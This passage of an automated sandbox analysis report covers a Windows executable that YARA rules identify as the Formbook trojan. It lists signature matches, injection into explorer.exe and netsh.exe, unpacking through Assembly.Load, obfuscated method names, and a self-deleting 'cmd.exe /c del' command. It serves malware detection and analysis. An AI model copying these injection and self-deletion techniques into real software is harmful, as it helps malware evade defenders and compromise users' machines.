          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4157684455.000000000F8A5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: 8tvMmyxveyzFcnJ.exe PID: 6740, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: 8tvMmyxveyzFcnJ.exe PID: 7164, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: netsh.exe PID: 396, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 8tvMmyxveyzFcnJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, HMGOMwjOIIDnmkZuPO.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, HMGOMwjOIIDnmkZuPO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, HMGOMwjOIIDnmkZuPO.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, HMGOMwjOIIDnmkZuPO.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, HMGOMwjOIIDnmkZuPO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, HMGOMwjOIIDnmkZuPO.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, jqNmxmQCLUwegVa6lt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, jqNmxmQCLUwegVa6lt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, jqNmxmQCLUwegVa6lt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, HMGOMwjOIIDnmkZuPO.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, HMGOMwjOIIDnmkZuPO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, HMGOMwjOIIDnmkZuPO.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.8tvMmyxveyzFcnJ.exe.2d8fb98.6.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.8tvMmyxveyzFcnJ.exe.7460000.15.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.8tvMmyxveyzFcnJ.exe.2dac47c.9.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: classification engineClassification label: mal100.troj.evad.winEXE@285/1@14/3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_01567DFA FormatMessageW,GetLastError,wprintf,GetStdHandle,LocalFree,6_2_01567DFA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_01568D48 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysAllocString,SysAllocString,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,6_2_01568D48
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8tvMmyxveyzFcnJ.exe.logJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
          Source: 8tvMmyxveyzFcnJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 8tvMmyxveyzFcnJ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 8tvMmyxveyzFcnJ.exeReversingLabs: Detection: 52%
          Source: 8tvMmyxveyzFcnJ.exeVirustotal: Detection: 49%
          Source: unknownProcess created: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess created: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess created: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess created: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"Jump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeProcess created: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"Jump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: 8tvMmyxveyzFcnJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 8tvMmyxveyzFcnJ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: 8tvMmyxveyzFcnJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: netsh.pdb source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F35000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755379848.0000000001330000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, netsh.exe, 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F35000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755379848.0000000001330000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000003.1756812796.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000003.1754917189.00000000009B9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 8tvMmyxveyzFcnJ.exe, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000006.00000003.1756812796.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000003.1754917189.00000000009B9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: AYIS.pdb source: 8tvMmyxveyzFcnJ.exe
          Source: Binary string: |.pDb source: 8tvMmyxveyzFcnJ.exe
          Source: Binary string: AYIS.pdbSHA256M source: 8tvMmyxveyzFcnJ.exe

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, HMGOMwjOIIDnmkZuPO.cs.Net Code: wxZ6pF2jRt System.Reflection.Assembly.Load(byte[])
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, HMGOMwjOIIDnmkZuPO.cs.Net Code: wxZ6pF2jRt System.Reflection.Assembly.Load(byte[])
          Source: 0.2.8tvMmyxveyzFcnJ.exe.2b55708.2.raw.unpack, PingPong.cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, HMGOMwjOIIDnmkZuPO.cs.Net Code: wxZ6pF2jRt System.Reflection.Assembly.Load(byte[])
          Source: 0.2.8tvMmyxveyzFcnJ.exe.5610000.13.raw.unpack, PingPong.cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 8tvMmyxveyzFcnJ.exeStatic PE information: 0xE84465C2 [Thu Jun 25 19:30:10 2093 UTC]
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 0_2_074811BD push FFFFFF8Bh; iretd 0_2_074811BF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041D56C push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041D502 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0041D50B push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B09AD push ecx; mov dword ptr [esp], ecx3_2_013B09B6
          Source: C:\Windows\explorer.exeCode function: 4_2_0F398B1E push esp; retn 0000h4_2_0F398B1F
          Source: C:\Windows\explorer.exeCode function: 4_2_0F398B02 push esp; retn 0000h4_2_0F398B03
          Source: C:\Windows\explorer.exeCode function: 4_2_0F3989B5 push esp; retn 0000h4_2_0F398AE7
          Source: C:\Windows\explorer.exeCode function: 4_2_0F8909B5 push esp; retn 0000h4_2_0F890AE7
          Source: C:\Windows\explorer.exeCode function: 4_2_0F890B02 push esp; retn 0000h4_2_0F890B03
          Source: C:\Windows\explorer.exeCode function: 4_2_0F890B1E push esp; retn 0000h4_2_0F890B1F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D2225F pushad ; ret 6_2_00D227F9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D227FA pushad ; ret 6_2_00D227F9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D2283D push eax; iretd 6_2_00D22858
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D509AD push ecx; mov dword ptr [esp], ecx6_2_00D509B6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D2135E push eax; iretd 6_2_00D21369
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D29939 push es; iretd 6_2_00D29940
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_01569C4D push ecx; ret 6_2_01569C60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_0041D4B5 push eax; ret 6_2_0041D508
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_0041D56C push eax; ret 6_2_0041D572
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_0041D502 push eax; ret 6_2_0041D508
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_0041D50B push eax; ret 6_2_0041D572
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BBE9B5 push esp; retn 0000h6_2_00BBEAE7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BBEB1E push esp; retn 0000h6_2_00BBEB1F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BBEB02 push esp; retn 0000h6_2_00BBEB03
          Source: 8tvMmyxveyzFcnJ.exeStatic PE information: section name: .text entropy: 7.982529796574812
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, onEMYZPssEM9ipODqah.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E89cPH9Hju', 'RQNcvKmLcJ', 'D00cliKtTj', 'WopcONCktE', 'tPicZZOl22', 'Y4LcIb4kpx', 'NEbcRp16VR'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, Nm8B0UVPYgNp4iEWC3.csHigh entropy of concatenated method names: 'fGYU8D0fT7', 'AHUUHf093S', 'g7uANNlqFW', 'C3wAKjloRG', 'T8ZUYog6Xw', 'eqCUgDrmSx', 'afrU2xIKer', 'eowUPwroHc', 'E4uUvZ9ZZk', 'yBlUlFsUaC'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, URuq7t1pp4AeVpLfjp.csHigh entropy of concatenated method names: 'uGXpvJHi9', 'AV4k76gcZ', 'MFlj9DetZ', 'GU7boBVGN', 'IpD75u7KT', 'WWLLCPZ7E', 'J7eT3UCtnbv7OM7ixk', 'SdbOpjF0pIFxlMa9Hl', 'YIlABuoG3', 'hqKcZC9uF'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, HMGOMwjOIIDnmkZuPO.csHigh entropy of concatenated method names: 'Lelw9Iu72t', 'cC9wCl81lD', 'E5bwMe9gyt', 'WPCwWDnpFc', 'f1wwt9hyXZ', 'N2swGhPFAN', 'kGdwm4EI3q', 'g76whZi0J5', 'VupwDOGJ0J', 'iyBwSLhvJb'
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, B9GVVKPIXwO0PmUQSxH.csHigh entropy of concatenated method names: 'bSLd1ZpQ1f', 'G0adqwWTRP', 'NxSdpvZAQy', 'YgFdkBew3Y', 'wJEdT3CZGL', 'lMAdjTBY57', 'BaFdbhWhO4', 'IBYdoOcBeG', 'K7rd7DTgTs', 'yGidLCUfcw'
